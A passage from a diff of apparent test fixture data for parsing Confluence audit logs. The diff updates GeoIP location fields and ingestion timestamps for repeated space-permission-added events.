user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEBLOG\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"to\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -3579,20 +3369,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -3600,7 +3384,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222439618Z", + "ingested": "2021-12-14T14:34:31.513215291Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.713Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEBLOG\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -3678,20 +3462,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -3699,7 +3477,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222441508Z", + "ingested": "2021-12-14T14:34:31.513215714Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.705Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVECOMMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -3784,20 +3562,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -3805,7 +3577,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222443401Z", + "ingested": "2021-12-14T14:34:31.513216191Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.688Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVECOMMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -3890,20 +3662,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -3911,7 +3677,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222445293Z", + "ingested": "2021-12-14T14:34:31.513216595Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.675Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVECOMMENT\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"to\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -3996,20 +3762,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -4017,7 +3777,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222447176Z", + "ingested": "2021-12-14T14:34:31.513217020Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.668Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVECOMMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -4095,20 +3855,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -4116,7 +3870,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222449108Z", + "ingested": "2021-12-14T14:34:31.513217407Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.654Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEPAGE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -4201,20 +3955,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -4222,7 +3970,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222451010Z", + "ingested": "2021-12-14T14:34:31.513217926Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.644Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEPAGE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -4307,20 +4055,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -4328,7 +4070,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222452910Z", + "ingested": "2021-12-14T14:34:31.513218671Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.639Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEPAGE\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"to\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -4413,20 +4155,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -4434,7 +4170,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222454777Z", + "ingested": "2021-12-14T14:34:31.513219202Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.634Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEPAGE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -4519,20 +4255,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -4540,7 +4270,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222456711Z", + "ingested": "2021-12-14T14:34:31.513219685Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.628Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"SETSPACEPERMISSIONS\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"to\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -4625,20 +4355,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -4646,7 +4370,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222458581Z", + "ingested": "2021-12-14T14:34:31.513220157Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.618Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"SETSPACEPERMISSIONS\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -4724,20 +4448,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -4745,7 +4463,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222460470Z", + "ingested": "2021-12-14T14:34:31.513220551Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.612Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"EDITSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -4830,20 +4548,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -4851,7 +4563,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222462360Z", + "ingested": "2021-12-14T14:34:31.513220940Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.606Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"EDITSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -4936,20 +4648,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -4957,7 +4663,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222464260Z", + "ingested": "2021-12-14T14:34:31.513221318Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.596Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"EDITSPACE\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"to\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -5042,20 +4748,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -5063,7 +4763,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222466165Z", + "ingested": "2021-12-14T14:34:31.513221712Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.592Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"EDITSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -5141,20 +4841,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -5162,7 +4856,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222468196Z", + "ingested": "2021-12-14T14:34:31.513222283Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.588Z\",\"author\":{\"name\":\"test 